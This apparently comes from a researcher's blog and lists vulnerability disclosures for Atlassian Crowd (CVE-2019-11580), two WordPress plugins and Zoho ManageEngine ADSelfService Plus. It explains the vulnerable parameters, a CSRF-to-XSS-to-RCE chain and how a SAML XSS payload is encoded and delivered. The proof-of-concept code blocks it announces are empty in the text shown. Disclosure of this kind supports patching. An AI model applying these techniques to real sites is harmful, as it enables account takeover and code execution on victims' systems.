Sharing my proof of concept for Atlassian Crowd RCE – CVE-2019-11580. I was going to make a blog post detailing all the inner workings but someone has already made a very detailed analysis here: https://www.corben.io/atlassian-crowd-rce/
You can find all the source code here:
An issue was discovered in the wp-code-highlightjs plugin through 0.6.2 for WordPress.
wp-admin/options-general.php?page=wp-code-highlight-js allows CSRF, as demonstrated by an XSS payload in the hljs_additional_css parameter.
An attacker could leverage this CSRF to include a script-tag that will execute upon CSRF, coupled with a wordpress user-create payload could potentially lead to RCE.
Proof of Concept:
where poc.js could be a payload similar to:
miniOrange SAML SP Single Sign On WordPress Plugin version 4.8.72 and below are vulnerable to a Cross Site Scripting attack via a specially crafted SAMLReponse XML payload.
This exploit works by passing a crafted SAMLReponse and RelayState variable to https://victim.com/wp-login.php
It will then parse out the SAMLResponse message and in the event that the SAML is anything other than a “Success” the script will dump the contents of the expected parameter, so you can inject any HTML into this variable.
For example a SAMLResponse payload will look like this:
This payload will need to be Base64 encoded and sent as a “SAMLReponse” parameter along with RelayState=testValidate.
Proof of concept:
RestAPI/PasswordSelfServiceAPI in Zoho ManageEngine ADSelfService Plus version 5707 and below allows remote attackers to inject arbitrary web
script or HTML via the PSS_OPERATION parameter.
Example Proof of Concept:
Store XSS Payload: